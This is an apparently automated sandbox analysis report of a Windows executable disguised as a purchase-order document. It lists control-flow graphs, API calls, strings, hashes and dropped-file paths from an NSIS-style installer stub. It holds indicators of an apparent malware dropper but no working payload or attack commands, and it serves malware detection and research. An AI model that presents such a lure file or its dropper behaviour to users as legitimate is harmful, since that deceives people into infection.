                                                                                                                                                                • Instruction ID: dbefa70d923fed6e2c1f4067a34d9ed24c8bf5ef1377c6d65b2935cebb3f649c
                                                                                                                                                                • Opcode Fuzzy Hash: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
                                                                                                                                                                • Instruction Fuzzy Hash: E0128971D0464ADEFB20CFA4C8817EEBBF4FB043D0F21852AE595E6189DB749A81CB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 671 404e84-404e99 672 404f4f-404f53 671->672 673 404e9f-404eb1 671->673 674 404eb3-404eb7 call 405b99 673->674 675 404ebc-404ec8 lstrlenA 673->675 674->675 677 404ee5-404ee9 675->677 678 404eca-404eda lstrlenA 675->678 680 404ef8-404efc 677->680 681 404eeb-404ef2 SetWindowTextA 677->681 678->672 679 404edc-404ee0 lstrcatA 678->679 679->677 682 404f42-404f44 680->682 683 404efe-404f40 SendMessageA * 3 680->683 681->680 682->672 684 404f46-404f49 682->684 683->682 684->672
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                                                                                                                                                • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                                                                                                                                                • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                                                                                                                                                • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll), ref: 00404EF2
                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll
                                                                                                                                                                • API String ID: 2531174081-2929424040
                                                                                                                                                                • Opcode ID: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                                                                                                                                                • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                                                                                                                                                • Opcode Fuzzy Hash: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                                                                                                                                                • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 685 402e6c-402e82 686 402e84 685->686 687 402e8b-402e93 685->687 686->687 688 402e95 687->688 689 402e9c-402ea1 687->689 688->689 690 402eb1-402ebe call 403072 689->690 691 402ea3-402eac call 4030a4 689->691 695 403060 690->695 696 402ec4-402ec8 690->696 691->690 697 403062-403063 695->697 698 403001-403003 696->698 699 402ece-402ef1 GetTickCount 696->699 702 40306b-40306f 697->702 700 403005-403008 698->700 701 40304d-403050 698->701 703 402ef7 699->703 704 403068 699->704 700->704 707 40300a 700->707 705 403052 701->705 706 403055-40305e call 403072 701->706 708 402efc-402f04 703->708 704->702 705->706 706->695 718 403065 706->718 710 40300f-403015 707->710 711 402f06 708->711 712 402f09-402f12 call 403072 708->712 714 403017 710->714 715 40301a-403023 call 403072 710->715 711->712 712->695 720 402f18-402f21 712->720 714->715 715->695 723 403025-403038 WriteFile 715->723 718->704 722 402f27-402f47 call 405f82 720->722 730 402ff9-402ffb 722->730 731 402f4d-402f64 GetTickCount 722->731 724 40303a-40303d 723->724 725 402ffd-402fff 723->725 724->725 727 40303f-403049 724->727 725->697 727->710 729 40304b 727->729 729->704 730->697 732 402f66-402f6e 731->732 733 402fa9-402fad 731->733 734 402f70-402f74 732->734 735 402f76-402fa1 MulDiv wsprintfA call 404e84 732->735 736 402fee-402ff1 733->736 737 402faf-402fb2 733->737 734->733 734->735 743 402fa6 735->743 736->708 738 402ff7 736->738 740 402fd4-402fdf 737->740 741 402fb4-402fc8 WriteFile 737->741 738->704 742 402fe2-402fe6 740->742 741->725 744 402fca-402fcd 741->744 742->722 745 402fec 742->745 743->733 744->725 746 402fcf-402fd2 744->746 745->704 746->742
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ECE
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402F55
                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F82
                                                                                                                                                                • wsprintfA.USER32 ref: 00402F92
                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0078F2A8,7FFFFFFF,00000000), ref: 00402FC0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                • API String ID: 4209647438-2449383134
                                                                                                                                                                • Opcode ID: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                                                                                                                                                • Instruction ID: abbc5e543d40cc295139a54e2e8a13b251616715b744bb5f177e15d4b263a606
                                                                                                                                                                • Opcode Fuzzy Hash: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                                                                                                                                                • Instruction Fuzzy Hash: B1519C7190121AABCF10DF69DA48A9E7BB8BF04355F14413BF901B72C4D3789E50DBAA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 747 405854-40585e 748 40585f-40588a GetTickCount GetTempFileNameA 747->748 749 405899-40589b 748->749 750 40588c-40588e 748->750 752 405893-405896 749->752 750->748 751 405890 750->751 751->752
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405868
                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405882
                                                                                                                                                                Strings
                                                                                                                                                                • "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", xrefs: 00405854
                                                                                                                                                                • nsa, xrefs: 0040585F
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405857, 0040585B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                • API String ID: 1716503409-1966879930
                                                                                                                                                                • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                                                                                                • Instruction ID: 7032c49e779d22ef4b019cebcd704e5cdda6a64cd28d021928a5f34cef86c798
                                                                                                                                                                • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                                                                                                                                                • Instruction Fuzzy Hash: 21F082777082046BDB109F66DC04B9B7B9CDF95750F14C03BFE44DA180D6B499548B59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 753 100016da-10001716 call 10001a86 757 10001827-10001829 753->757 758 1000171c-10001720 753->758 759 10001722-10001728 call 10002165 758->759 760 10001729-10001736 call 100021af 758->760 759->760 765 10001766-1000176d 760->765 766 10001738-1000173d 760->766 767 1000178d-10001791 765->767 768 1000176f-1000178b call 1000236d call 10001576 call 10001278 GlobalFree 765->768 769 10001758-1000175b 766->769 770 1000173f-10001740 766->770 771 10001793-100017cd call 10001576 call 1000236d 767->771 772 100017cf-100017d5 call 1000236d 767->772 793 100017d6-100017da 768->793 769->765 773 1000175d-1000175e call 10002a57 769->773 775 10001742-10001743 770->775 776 10001748-10001749 call 1000279c 770->776 771->793 772->793 786 10001763 773->786 781 10001750-10001756 call 10002540 775->781 782 10001745-10001746 775->782 789 1000174e 776->789 792 10001765 781->792 782->765 782->776 786->792 789->786 792->765 796 10001817-1000181e 793->796 797 100017dc-100017ea call 10002333 793->797 796->757 799 10001820-10001821 GlobalFree 796->799 803 10001802-10001809 797->803 804 100017ec-100017ef 797->804 799->757 803->796 805 1000180b-10001816 call 100014ff 803->805 804->803 806 100017f1-100017f9 804->806 805->796 806->803 808 100017fb-100017fc FreeLibrary 806->808 808->803
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                                                                                                  • Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197
                                                                                                                                                                  • Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                                                                                                                                                  • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                                                                                                  • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                                                                                                                                                  • Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                                                                                                  • Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1767494692-3916222277
                                                                                                                                                                • Opcode ID: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                                                                                                                                                • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                                                                                                                                                • Opcode Fuzzy Hash: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                                                                                                                                                • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 810 405712-40572d call 405b77 call 4056bd 815 405733-405740 call 405de2 810->815 816 40572f-405731 810->816 820 405742-405746 815->820 821 40574c-40574e 815->821 817 405785-405787 816->817 820->816 822 405748-40574a 820->822 823 405764-40576d lstrlenA 821->823 822->816 822->821 824 405750-405757 call 405e7b 823->824 825 40576f-405783 call 405624 GetFileAttributesA 823->825 830 405759-40575c 824->830 831 40575e-40575f call 40566b 824->831 825->817 830->816 830->831 831->823
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                                                                                                                                                  • Part of subcall function 004056BD: CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,76DC3410,00405474,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004056CB
                                                                                                                                                                  • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                                                                                                                                                  • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                                                                                                                                                • lstrlenA.KERNEL32(outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,76DC3410,00405474,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 00405765
                                                                                                                                                                • GetFileAttributesA.KERNELBASE(outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,76DC3410,00405474,?,C:\Users\user\AppData\Local\Temp\,76DC3410), ref: 00405775
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                • String ID: outvillain\faber.div
                                                                                                                                                                • API String ID: 3248276644-1876387199
                                                                                                                                                                • Opcode ID: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                                                                                                                                                • Instruction ID: 9c3b755cb3c6d616dab6a000ce5f665f7bfd003de174882c1d400389f5d3e8f3
                                                                                                                                                                • Opcode Fuzzy Hash: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                                                                                                                                                • Instruction Fuzzy Hash: 62F0C835105D5499C62237391D45AAF2658CD87364F180A3BF851B32D1DB3C8942BDAE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E3A
                                                                                                                                                                  • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                                                                                                                                                  • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E4C
                                                                                                                                                                  • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E5C
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 004030DC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 4115351271-2414109610
                                                                                                                                                                • Opcode ID: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                                                                                                                                                • Instruction ID: c9728f7b553dd8aa4c0e43ad66b561e8a411fb1fe81b444dc1201db4bd0af2db
                                                                                                                                                                • Opcode Fuzzy Hash: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                                                                                                                                                • Instruction Fuzzy Hash: 13D09222506D3122E99132263C06FCF1A4C8F8B35AF51817BF50A781855A6D1A92C9FE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 848 405a5e-405a8f RegOpenKeyExA 849 405a91-405ab0 RegQueryValueExA 848->849 850 405acf-405ad2 848->850 851 405ab2-405ab6 849->851 852 405abe 849->852 853 405ac0-405ac9 RegCloseKey 851->853 854 405ab8-405abc 851->854 852->853 853->850 854->852 854->853
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405CA3,00000000,00000002,?,00000002,?,?,00405CA3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A87
                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA3,?,00405CA3), ref: 00405AA8
                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405AC9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                • Instruction ID: 3b0245f56489bc6861cff030ff267d915796a633b737c7f0fb79f2751f8918b0
                                                                                                                                                                • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                • Instruction Fuzzy Hash: 74015A7114020AEFDB128F64EC88AEB3FACEF14394F044136F905A6260D235D964CFA5
                                                                                                                                                                Uniqueness

